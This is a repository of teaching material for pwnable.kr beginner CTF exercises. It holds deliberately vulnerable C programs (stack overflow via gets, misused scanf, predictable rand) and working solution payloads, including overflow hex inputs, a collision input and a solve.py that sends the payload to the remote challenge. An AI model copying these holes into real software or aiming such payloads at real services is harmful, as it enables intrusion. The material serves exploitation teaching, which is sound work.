├── README.md
├── a_first_introduction_to_system_exploitation.tex
├── code
    ├── fd_demo
    ├── fd_demo.c
    ├── gdbinit_sample
    ├── hash_demo.out
    ├── hash_demo.py
    ├── hello_assembly.c
    ├── hello_assembly.gdb
    ├── lousy_calc.py
    ├── pexpect_demo.py
    ├── test.dat
    ├── test.hex
    ├── test_output.txt
    ├── xxd_demo
    ├── xxd_demo.hex
    └── xxd_demo_2
├── exercises
    ├── 00_fd
    │   ├── fd.c
    │   ├── fd_after_open.png
    │   ├── fd_before_open.png
    │   ├── fd_permissions.png
    │   └── fd_welcome_message.png
    ├── 01_collision
    │   ├── col.c
    │   ├── pass
    │   └── pass.hex
    ├── 02_bof
    │   ├── bof.c
    │   ├── func_breakpoint.png
    │   ├── local_test.png
    │   ├── local_test_2.png
    │   ├── remote_test.png
    │   ├── solution.hex
    │   ├── solve.py
    │   └── stack_view.png
    ├── 03_flag
    │   ├── bingo.png
    │   ├── first_attempt.png
    │   ├── go_to_unpacked_code.gdb
    │   ├── interrupt.png
    │   ├── memory_map.png
    │   ├── packed_assembly.png
    │   ├── program_output.png
    │   ├── start_breakpoint.png
    │   ├── strace.png
    │   └── unpacked_code.png
    ├── 04_passcode
    │   ├── exploit.hex
    │   ├── fflush.png
    │   ├── passcode.c
    │   ├── segfault.png
    │   ├── success.png
    │   └── warning.png
    ├── 05_random
    │   ├── random.c
    │   └── random_value.png
    ├── 06_input
    │   └── solve.sh
    ├── 07_leg
    │   ├── leg.asm
    │   └── leg.c
    ├── 08_mistake
    │   ├── in_rust
    │   │   ├── mistake.rs
    │   │   └── rendered.png
    │   ├── mistake.c
    │   └── two_prompts.png
    ├── 09_shellshock
    │   ├── not_vulnerable.png
    │   ├── permission_denied.png
    │   ├── shellshock.c
    │   └── vulnerable.png
    ├── 10_coin
    │   ├── coin.py
    │   └── introduction.png
    ├── 11_blackjack
    │   ├── flag.png
    │   ├── negative_million.png
    │   └── normal_game.png
    ├── 12_lotto
    │   ├── flag.png
    │   ├── lotto.c
    │   ├── lotto_snippet.c
    │   └── normal_game.png
    ├── 13_cmd1
    │   └── cmd1.c
    ├── 14_cmd2
    │   ├── backslashes.png
    │   ├── cmd2.c
    │   └── tex_source.png
    ├── 15_uaf
    │   └── input.hex
    ├── 16_memcpy
    │   ├── alloc_test.png
    │   ├── in_disassembler.png
    │   ├── inline_assembly.png
    │   ├── naive_attempt.png
    │   ├── naive_attempt_2.png
    │   └── solution.png
    ├── 17_asm
    │   ├── actual_system_call_numbers.png
    │   ├── assembly_test_elf.asm
    │   ├── assembly_test_minimal.asm
    │   ├── assembly_test_minimal.png
    │   ├── draft_in_disassembler.png
    │   ├── file_copy.asm
    │   ├── need_lea.png
    │   ├── npic.png
    │   ├── parameter.png
    │   ├── shellcode_in_memory.png
    │   ├── sigalarm.png
    │   ├── solution.gdb
    │   ├── solution_draft.asm
    │   ├── solution_draft_redacted.asm
    │   ├── solution_redacted.asm
    │   ├── solve.png
    │   └── stub.png
    ├── 18_unlink
    │   ├── attack_overview.png
    │   ├── dog_chemistry_set.jpg
    │   ├── exploit_skeleton.asm
    │   ├── jz_instruction.png
    │   ├── memory_map.png
    │   ├── semantic_diagram.png
    │   ├── semantic_diagram_eh.png
    │   ├── solution.py
    │   ├── unlink.gdb
    │   └── unlink_disassembly.png
    ├── 19_blukat
    │   ├── blukat.c
    │   ├── cat_password.png
    │   ├── file_permissions.png
    │   ├── group_check.png
    │   ├── locally.png
    │   ├── nano.png
    │   ├── python.png
    │   ├── solution.png
    │   ├── stack_canary.png
    │   └── xxd.png
    └── 20_horcruxes
    │   ├── exploit.asm
    │   ├── healer.png
    │   ├── normal_play.png
    │   └── solution.py
├── images
    ├── 00_fd.png
    ├── 01_collision.png
    ├── 02_bof.png
    ├── 03_flag.png
    ├── 04_passcode.png
    ├── 05_random.png
    ├── 06_input.png
    ├── 07_leg.png
    ├── 08_mistake.png
    ├── 09_shellshock.png
    ├── 10_coin.png
    ├── 11_blackjack.png
    ├── 12_lotto.png
    ├── 13_cmd1.png
    ├── 14_cmd2.png
    ├── 15_uaf.png
    ├── 16_memcpy.png
    ├── 17_asm.png
    ├── 18_unlink.png
    ├── 19_blukat.png
    ├── 20_horcruxes.png
    ├── Blue_Screen_of_AAAAA.jpg
    ├── a_little_bit_of_everything.jpg
    ├── access_control_file_list.png
    ├── aint_no_rule.jpg
    ├── alice_bob_suid.png
    ├── all_challenges.png
    ├── ascii_table.png
    ├── baton.png
    ├── bearwithme.png
    ├── buffer_overflow.png
    ├── c_heap.png
    ├── canary.jpg
    ├── casino.png
    ├── chroot_jail.png
    ├── complications.png
    ├── cpr.png
    ├── debugging_interaction.png
    ├── dep.png
    ├── dep_sign.png
    ├── environment.png
    ├── ew_math.jpg
    ├── expectation_vs_reality.jpg
    ├── file_descriptors.png
    ├── file_permissions.png
    ├── file_permissions_how_to_read.png
    ├── hash_function_creation.jpg
    ├── hash_functions.jpg
    ├── hello_assembly_debugger.png
    ├── hello_assembly_x86.png
    ├── hello_assembly_x86_resized.png
    ├── if_statement_assembly.png
    ├── im_so_random.png
    ├── nc_demo.png
    ├── obfuscated_code.png
    ├── packed.jpg
    ├── passwd_suid.png
    ├── pizza_hack.jpg
    ├── pma.jpg
    ├── process_memory.jpg
    ├── pwnable_splash.png
    ├── qa.png
    ├── robot_laptop.jpg
    ├── rop_stack_layout.png
    ├── rube_goldberg.jpg
    ├── sandwich.png
    ├── simple_assembly.png
    ├── ssh.png
    ├── stack.jpg
    ├── stack_canary_illustration.png
    ├── stack_frame.png
    ├── stack_frame_ret_to_libc.png
    ├── stack_frame_ret_to_libc_old.png
    ├── suid_passwd.png
    ├── system_call.png
    ├── szimpla_kert.jpg
    ├── target_environment.png
    ├── texput.log
    ├── ubuntu.png
    ├── vtable_diagram.png
    └── wannacry.jpg
├── license.txt
└── makefile


/README.md:
--------------------------------------------------------------------------------
 1 | Contributed by Check Point Software, 2019.
 2 | 
 3 | # "I want to learn about exploitation! Where do I start?"
 4 | 
 5 | We’ve heard this question a lot. We’re even young enough to remember having asked it. The standard answer is often an embarrassed mumble that there are no golden rules, and that you should probably follow this or that person on Twitter to get tips, then “go practice, like maybe do some CTF exercises, I don’t know.” CTF exercises are basically self-contained challenges that require the player to crack some problem and recover some piece of text (the “flag”) as a proof of having cracked the problem.
 6 | 
 7 | Beginners can try solving CTF exercises, but they don’t necessarily end up having a good experience. These exercises are often challenging but not very educational; many of them are full of technical gotchas and pure caprice, confusing beginners who often have difficulty telling these apart from the core of the problem.
 8 | If you fail to find a solution to a CTF challenge, it usually means you have wasted a few hours and gained zero knowledge – certainly a frustrating experience.
 9 | Even if you do succeed, it is not uncommon to find that a lot of excellent learning opportunities go to waste in the process.
10 |  
11 | 
12 | This is why we Love, with a capital L, a well-motivated CTF exercise with a thorough solution write-up. These allow you to contend with the problem on your own — but also explain why you should even care about the problem, as well as illustrate what mindset and toolset might be required to approach the problem correctly. Even if you do not succeed, a good write-up clearly walks you through the correct solution; and at every step of the way, it answers the question that troubles students everywhere the most: “But how was *I* supposed to think of that?”
13 | 
14 | Georgia Tech’s “Toddler’s Bottle” exercises are very close to the ideal of a well-motivated exploitation CTF exercise – they are short, distilled and to the point. To complement them, we’ve authored the below-linked document — a sequence of guided solutions and lecture notes that walk the reader through the challenges, provide context and perspective and try to live up to the ideal described above.
15 | 
16 | So, “Where do I start?” — there really is no straightforward solution, but hopefully this guide will get you going. Good luck! You can find the rendered PDF in the "releases" section.
17 | 
18 | # Getting the PDF
19 | 
20 | Head on to the "releases" section to get the latest version of the PDF.
21 | 
22 | If you'd rather make the PDF from source: clone or download the repository and from your local repo copy run `make booklet`. If prompted for missing latex dependencies, install them.
23 | 
24 | # Changelog
25 | 
26 | 2021-04-14: Minor grammar fix, make the rendered pdf a release rather than keeping it inside the repo like a plebe.
27 | 


--------------------------------------------------------------------------------
/code/fd_demo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/code/fd_demo


--------------------------------------------------------------------------------
/code/fd_demo.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <unistd.h>
 3 | #include <fcntl.h>
 4 | 
 5 | int main() {
 6 |     int fd;
 7 |     int pid;
 8 |     pid = getpid();
 9 |     printf("Process id is: %d\n", pid);
10 |     printf("Press return to open new file descriptor.");
11 |     getchar();
12 |     fd = open("testing.txt",O_CREAT);
13 |     if (fd == -1) {
14 |         printf("Failed to open file.\n");
15 |         return 1;
16 |     }
17 |     printf("Press return to close file descriptor and exit.");
18 |     getchar();
19 |     close(fd);
20 |     return 0;
21 | }
22 | 


--------------------------------------------------------------------------------
/code/gdbinit_sample:
--------------------------------------------------------------------------------
1 | set disassembly-flavor intel
2 | layout regs
3 | 


--------------------------------------------------------------------------------
/code/hash_demo.out:
--------------------------------------------------------------------------------
1 | b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9
2 | 


--------------------------------------------------------------------------------
/code/hash_demo.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/python3
2 | 
3 | from hashlib import sha256
4 | 
5 | message = b"hello world"
6 | h = sha256()
7 | h.update(message)
8 | print(h.hexdigest())
9 | 


--------------------------------------------------------------------------------
/code/hello_assembly.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | int fib_recursion(int i) {
 4 |     if (i<=0) {
 5 |         return -1;
 6 |     }
 7 |     if (i==1) {
 8 |         return 1;
 9 |     }
10 |     if (i==2) {
11 |         return 1;
12 |     }
13 |     return fib_recursion(i-1)+fib_recursion(i-2);
14 | }
15 | 
16 | int fib_iteration(int i) {
17 |     int cur = 1;
18 |     int prev = 1;
19 |     int temp;
20 |     int j;
21 | 
22 |     if (i<=0) {
23 |         return -1;
24 |     }
25 |     if (i==1) {
26 |         return 1;
27 |     }
28 | 
29 |     for (j=2; j<i; j++) {
30 |         temp = cur;
31 |         cur = cur + prev;
32 |         prev = temp;
33 |     }
34 |     return cur;
35 | }
36 | 
37 | void draw_triangle(int i) {
38 |     int j;
39 |     int k;
40 | 
41 |     for (j=0; j<i; j++) {
42 |         for (k=0; k<j; k++) {
43 |             printf("*");
44 |         } printf("\n");
45 |     }
46 | }
47 | 
48 | 
49 | 
50 | int main() {
51 |     printf("Hello world!\n");
52 |     printf("The 5th fibonacci number is: %d\n", fib_recursion(5));
53 |     printf("The 7th fibonacci number is: %d\n", fib_iteration(7));
54 |     printf("Here's a triangle:\n");
55 |     draw_triangle(10);
56 |     return 0;
57 | }
58 | 


--------------------------------------------------------------------------------
/code/hello_assembly.gdb:
--------------------------------------------------------------------------------
1 | file hello_assembly
2 | break *fib_recursion
3 | r
4 | i r
5 | 


--------------------------------------------------------------------------------
/code/lousy_calc.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/python3
 2 | import time
 3 | import random
 4 | 
 5 | delay = lambda: time.sleep(random.choice(range(100)) / 10)
 6 | 
 7 | if random.choice(range(5))!=0:
 8 |     print("Not feeling like working today! lol")
 9 |     exit(0)
10 | delay()
11 | print("You have to insert the first number manually! Haha!")
12 | print("Not letting you pick a random value! Insert it yourself!")
13 | x1 = int(input("!#@#$@> "))
14 | delay()
15 | #Maybe we should explicitly prompt for the second number? haha lol no
16 | x2 = int(input("!#$@$> "))
17 | delay()
18 | print(f"Fine here's your sum: {x1}+{x2}={x1+x2+9} go ahead and choke on it")
19 | 
20 | 
21 | 


--------------------------------------------------------------------------------
/code/pexpect_demo.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/python3
 2 | 
 3 | import pexpect
 4 | import random
 5 | import re
 6 | 
 7 | 
 8 | while True:
 9 |     p = pexpect.spawn("./lousy_calc.py")
10 |     p.setecho(False)
11 |     result = p.expect(["> ", "lol"])
12 |     if result != 0:
13 |         print("Just a moment, the adder is not being cooperative...")
14 |         continue
15 |     print("I've persuaded the adder to cooperate =)")
16 |     x1 = random.choice(range(100))
17 |     print(f"I chose x1 randomly for your convenience: {x1}")
18 |     p.sendline(str(x1))
19 |     p.expect("> ")
20 |     x2 = int(input("Please kindly supply a value for x2: "))
21 |     p.sendline(str(x2))
22 |     p.expect(pexpect.EOF)
23 |     answer = p.before.decode("ascii")
24 |     lousy_result = int(re.search("=([0-9]+)", answer).group(1))
25 |     print(f"Kind sir, your resulting sum is {lousy_result-9}. Have a nice day!")
26 |     break
27 | 
28 | 


--------------------------------------------------------------------------------
/code/test.dat:
--------------------------------------------------------------------------------
1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


--------------------------------------------------------------------------------
/code/test.hex:
--------------------------------------------------------------------------------
1 | 00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
2 | 00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
3 | 00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
4 | 00000030: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
5 | 00000040: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
6 | 


--------------------------------------------------------------------------------
/code/test_output.txt:
--------------------------------------------------------------------------------
 1 | Hello world!
 2 | The 5th fibonacci number is: 5
 3 | The 7th fibonacci number is: 13
 4 | Here's a triangle:
 5 | 
 6 | *
 7 | **
 8 | ***
 9 | ****
10 | *****
11 | ******
12 | *******
13 | ********
14 | *********
15 | 


--------------------------------------------------------------------------------
/code/xxd_demo:
--------------------------------------------------------------------------------
1 | This is a message that should appear after converting from hexadecimal representation!
2 | 


--------------------------------------------------------------------------------
/code/xxd_demo.hex:
--------------------------------------------------------------------------------
1 | 00000000: 5468 6973 2069 7320 6120 6d65 7373 6167  This is a messag
2 | 00000010: 6520 7468 6174 2073 686f 756c 6420 6170  e that should ap
3 | 00000020: 7065 6172 2061 6674 6572 2063 6f6e 7665  pear after conve
4 | 00000030: 7274 696e 6720 6672 6f6d 2068 6578 6164  rting from hexad
5 | 00000040: 6563 696d 616c 2072 6570 7265 7365 6e74  ecimal represent
6 | 00000050: 6174 696f 6e21 0a                        ation!.
7 | 


--------------------------------------------------------------------------------
/code/xxd_demo_2:
--------------------------------------------------------------------------------
1 | This is a message that should appear after converting from hexadecimal representation!
2 | 


--------------------------------------------------------------------------------
/exercises/00_fd/fd.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | char buf[32];
 5 | int main(int argc, char* argv[], char* envp[]){
 6 | 	if(argc<2){
 7 | 		printf("pass argv[1] a number\n");
 8 | 		return 0;
 9 | 	}
10 | 	int fd = atoi( argv[1] ) - 0x1234;
11 | 	int len = 0;
12 | 	len = read(fd, buf, 32);
13 | 	if(!strcmp("LETMEWIN\n", buf)){
14 | 		printf("good job :)\n");
15 | 		system("/bin/cat flag");
16 | 		exit(0);
17 | 	}
18 | 	printf("learn about Linux file IO\n");
19 | 	return 0;
20 | 
21 | }
22 | 
23 | 


--------------------------------------------------------------------------------
/exercises/00_fd/fd_after_open.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/00_fd/fd_after_open.png


--------------------------------------------------------------------------------
/exercises/00_fd/fd_before_open.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/00_fd/fd_before_open.png


--------------------------------------------------------------------------------
/exercises/00_fd/fd_permissions.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/00_fd/fd_permissions.png


--------------------------------------------------------------------------------
/exercises/00_fd/fd_welcome_message.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/00_fd/fd_welcome_message.png


--------------------------------------------------------------------------------
/exercises/01_collision/col.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | unsigned long hashcode = 0x21DD09EC;
 4 | unsigned long check_password(const char* p){
 5 | 	int* ip = (int*)p;
 6 | 	int i;
 7 | 	int res=0;
 8 | 	for(i=0; i<5; i++){
 9 | 		res += ip[i];
10 | 	}
11 | 	return res;
12 | }
13 | 
14 | int main(int argc, char* argv[]){
15 | 	if(argc<2){
16 | 		printf("usage : %s [passcode]\n", argv[0]);
17 | 		return 0;
18 | 	}
19 | 	if(strlen(argv[1]) != 20){
20 | 		printf("passcode length should be 20 bytes\n");
21 | 		return 0;
22 | 	}
23 | 
24 | 	if(hashcode == check_password( argv[1] )){
25 | 		system("/bin/cat flag");
26 | 		return 0;
27 | 	}
28 | 	else
29 | 		printf("wrong passcode.\n");
30 | 	return 0;
31 | }
32 | 


--------------------------------------------------------------------------------
/exercises/01_collision/pass:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/01_collision/pass


--------------------------------------------------------------------------------
/exercises/01_collision/pass.hex:
--------------------------------------------------------------------------------
1 | 00: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
2 | 10: e8 04 d8 1c
3 | 


--------------------------------------------------------------------------------
/exercises/02_bof/bof.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <stdlib.h>
 4 | void func(int key){
 5 | 	char overflowme[32];
 6 | 	printf("overflow me : ");
 7 | 	gets(overflowme);	// smash me!
 8 | 	if(key == 0xcafebabe){
 9 | 		system("/bin/sh");
10 | 	}
11 | 	else{
12 | 		printf("Nah..\n");
13 | 	}
14 | }
15 | int main(int argc, char* argv[]){
16 | 	func(0xdeadbeef);
17 | 	return 0;
18 | }
19 | 
20 | 


--------------------------------------------------------------------------------
/exercises/02_bof/func_breakpoint.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/02_bof/func_breakpoint.png


--------------------------------------------------------------------------------
/exercises/02_bof/local_test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/02_bof/local_test.png


--------------------------------------------------------------------------------
/exercises/02_bof/local_test_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/02_bof/local_test_2.png


--------------------------------------------------------------------------------
/exercises/02_bof/remote_test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/02_bof/remote_test.png


--------------------------------------------------------------------------------
/exercises/02_bof/solution.hex:
--------------------------------------------------------------------------------
1 | 00: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
2 | 10: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
3 | 20: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
4 | 30: 41 41 41 41 be ba fe ca
5 | 


--------------------------------------------------------------------------------
/exercises/02_bof/solve.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/python3
 2 | 
 3 | import sys
 4 | import pexpect
 5 | import time
 6 | 
 7 | if sys.argv[1] == "mock":
 8 |     target = "./bof"
 9 | 
10 | if sys.argv[1] == "target":
11 |     target = "nc pwnable.kr 9000"
12 | 
13 | p = pexpect.spawn(target)
14 | with open("solution","rb") as fh:
15 |     p.sendline(fh.read())
16 | p.interact()
17 | 


--------------------------------------------------------------------------------
/exercises/02_bof/stack_view.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/02_bof/stack_view.png


--------------------------------------------------------------------------------
/exercises/03_flag/bingo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/bingo.png


--------------------------------------------------------------------------------
/exercises/03_flag/first_attempt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/first_attempt.png


--------------------------------------------------------------------------------
/exercises/03_flag/go_to_unpacked_code.gdb:
--------------------------------------------------------------------------------
1 | file flag
2 | break *0x44A4f0
3 | r
4 | d 1
5 | hbreak *0x419060
6 | c
7 | d 2
8 | 


--------------------------------------------------------------------------------
/exercises/03_flag/interrupt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/interrupt.png


--------------------------------------------------------------------------------
/exercises/03_flag/memory_map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/memory_map.png


--------------------------------------------------------------------------------
/exercises/03_flag/packed_assembly.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/packed_assembly.png


--------------------------------------------------------------------------------
/exercises/03_flag/program_output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/program_output.png


--------------------------------------------------------------------------------
/exercises/03_flag/start_breakpoint.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/start_breakpoint.png


--------------------------------------------------------------------------------
/exercises/03_flag/strace.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/strace.png


--------------------------------------------------------------------------------
/exercises/03_flag/unpacked_code.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/03_flag/unpacked_code.png


--------------------------------------------------------------------------------
/exercises/04_passcode/exploit.hex:
--------------------------------------------------------------------------------
1 | 00: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
2 | 10: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
3 | 20: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
4 | 30: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
5 | 40: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
6 | 50: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
7 | 60: 04a0 0408 0d0a 3133 3435 3134 3133 35    ......134514135
8 | 


--------------------------------------------------------------------------------
/exercises/04_passcode/fflush.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/04_passcode/fflush.png


--------------------------------------------------------------------------------
/exercises/04_passcode/passcode.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | 
 4 | void login(){
 5 | 	int passcode1;
 6 | 	int passcode2;
 7 | 
 8 | 	printf("enter passcode1 : ");
 9 | 	scanf("%d", passcode1);
10 | 	fflush(stdin);
11 | 
12 | 	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
13 | 	printf("enter passcode2 : ");
14 |         scanf("%d", passcode2);
15 | 
16 | 	printf("checking...\n");
17 | 	if(passcode1==338150 && passcode2==13371337){
18 |                 printf("Login OK!\n");
19 |                 system("/bin/cat flag");
20 |         }
21 |         else{
22 |                 printf("Login Failed!\n");
23 | 		exit(0);
24 |         }
25 | }
26 | 
27 | void welcome(){
28 | 	char name[100];
29 | 	printf("enter you name : ");
30 | 	scanf("%100s", name);
31 | 	printf("Welcome %s!\n", name);
32 | }
33 | 
34 | int main(){
35 | 	printf("Toddler's Secure Login System 1.0 beta.\n");
36 | 
37 | 	welcome();
38 | 	login();
39 | 
40 | 	// something after login...
41 | 	printf("Now I can safely trust you that you have credential :)\n");
42 | 	return 0;	
43 | }
44 | 
45 | 


--------------------------------------------------------------------------------
/exercises/04_passcode/segfault.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/04_passcode/segfault.png


--------------------------------------------------------------------------------
/exercises/04_passcode/success.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/04_passcode/success.png


--------------------------------------------------------------------------------
/exercises/04_passcode/warning.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/04_passcode/warning.png


--------------------------------------------------------------------------------
/exercises/05_random/random.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | int main(){
 4 | 	unsigned int random;
 5 | 	random = rand();	// random value!
 6 | 
 7 | 	unsigned int key=0;
 8 | 	scanf("%d", &key);
 9 | 
10 | 	if( (key ^ random) == 0xdeadbeef ){
11 | 		printf("Good!\n");
12 | 		system("/bin/cat flag");
13 | 		return 0;
14 | 	}
15 | 
16 | 	printf("Wrong, maybe you should try 2^32 cases.\n");
17 | 	return 0;
18 | }
19 | 
20 | 


--------------------------------------------------------------------------------
/exercises/05_random/random_value.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/05_random/random_value.png


--------------------------------------------------------------------------------
/exercises/06_input/solve.sh:
--------------------------------------------------------------------------------
 1 | #stdio
 2 | echo "00 00 0a 00 ff" | xxd -r > /tmp/bh/stdio.dat;
 3 | echo "00 00 0a 02 ff" | xxd -r > /tmp/bh/stderr.dat;
 4 | 
 5 | #netcat
 6 | echo "00 de ad be ef" | xxd -r > /tmp/bh/netcat.dat;
 7 | 
 8 | #file
 9 | echo "00 00 00 00 00" | xxd -r > $'\x0a';
10 | 
11 | env $'\xde\xad\xbe\xef'=$'\xca\xfe\xba\xbe' ./input A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A $'\0' $' \n\r' 29001 A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A  0< /tmp/bh/stdio.dat 2< /tmp/bh/stderr.dat > readable_flag.dat&
12 | 
13 | nc localhost 29001 < /tmp/bh/netcat.dat > /tmp/bh/netcat.out;
14 | 
15 | 


--------------------------------------------------------------------------------
/exercises/07_leg/leg.asm:
--------------------------------------------------------------------------------
 1 | (gdb) disass main
 2 | Dump of assembler code for function main:
 3 |    0x00008d3c <+0>:	push	{r4, r11, lr}
 4 |    0x00008d40 <+4>:	add	r11, sp, #8
 5 |    0x00008d44 <+8>:	sub	sp, sp, #12
 6 |    0x00008d48 <+12>:	mov	r3, #0
 7 |    0x00008d4c <+16>:	str	r3, [r11, #-16]
 8 |    0x00008d50 <+20>:	ldr	r0, [pc, #104]	; 0x8dc0 <main+132>
 9 |    0x00008d54 <+24>:	bl	0xfb6c <printf>
10 |    0x00008d58 <+28>:	sub	r3, r11, #16
11 |    0x00008d5c <+32>:	ldr	r0, [pc, #96]	; 0x8dc4 <main+136>
12 |    0x00008d60 <+36>:	mov	r1, r3
13 |    0x00008d64 <+40>:	bl	0xfbd8 <__isoc99_scanf>
14 |    0x00008d68 <+44>:	bl	0x8cd4 <key1>
15 |    0x00008d6c <+48>:	mov	r4, r0
16 |    0x00008d70 <+52>:	bl	0x8cf0 <key2>
17 |    0x00008d74 <+56>:	mov	r3, r0
18 |    0x00008d78 <+60>:	add	r4, r4, r3
19 |    0x00008d7c <+64>:	bl	0x8d20 <key3>
20 |    0x00008d80 <+68>:	mov	r3, r0
21 |    0x00008d84 <+72>:	add	r2, r4, r3
22 |    0x00008d88 <+76>:	ldr	r3, [r11, #-16]
23 |    0x00008d8c <+80>:	cmp	r2, r3
24 |    0x00008d90 <+84>:	bne	0x8da8 <main+108>
25 |    0x00008d94 <+88>:	ldr	r0, [pc, #44]	; 0x8dc8 <main+140>
26 |    0x00008d98 <+92>:	bl	0x1050c <puts>
27 |    0x00008d9c <+96>:	ldr	r0, [pc, #40]	; 0x8dcc <main+144>
28 |    0x00008da0 <+100>:	bl	0xf89c <system>
29 |    0x00008da4 <+104>:	b	0x8db0 <main+116>
30 |    0x00008da8 <+108>:	ldr	r0, [pc, #32]	; 0x8dd0 <main+148>
31 |    0x00008dac <+112>:	bl	0x1050c <puts>
32 |    0x00008db0 <+116>:	mov	r3, #0
33 |    0x00008db4 <+120>:	mov	r0, r3
34 |    0x00008db8 <+124>:	sub	sp, r11, #8
35 |    0x00008dbc <+128>:	pop	{r4, r11, pc}
36 |    0x00008dc0 <+132>:	andeq	r10, r6, r12, lsl #9
37 |    0x00008dc4 <+136>:	andeq	r10, r6, r12, lsr #9
38 |    0x00008dc8 <+140>:			; <UNDEFINED> instruction: 0x0006a4b0
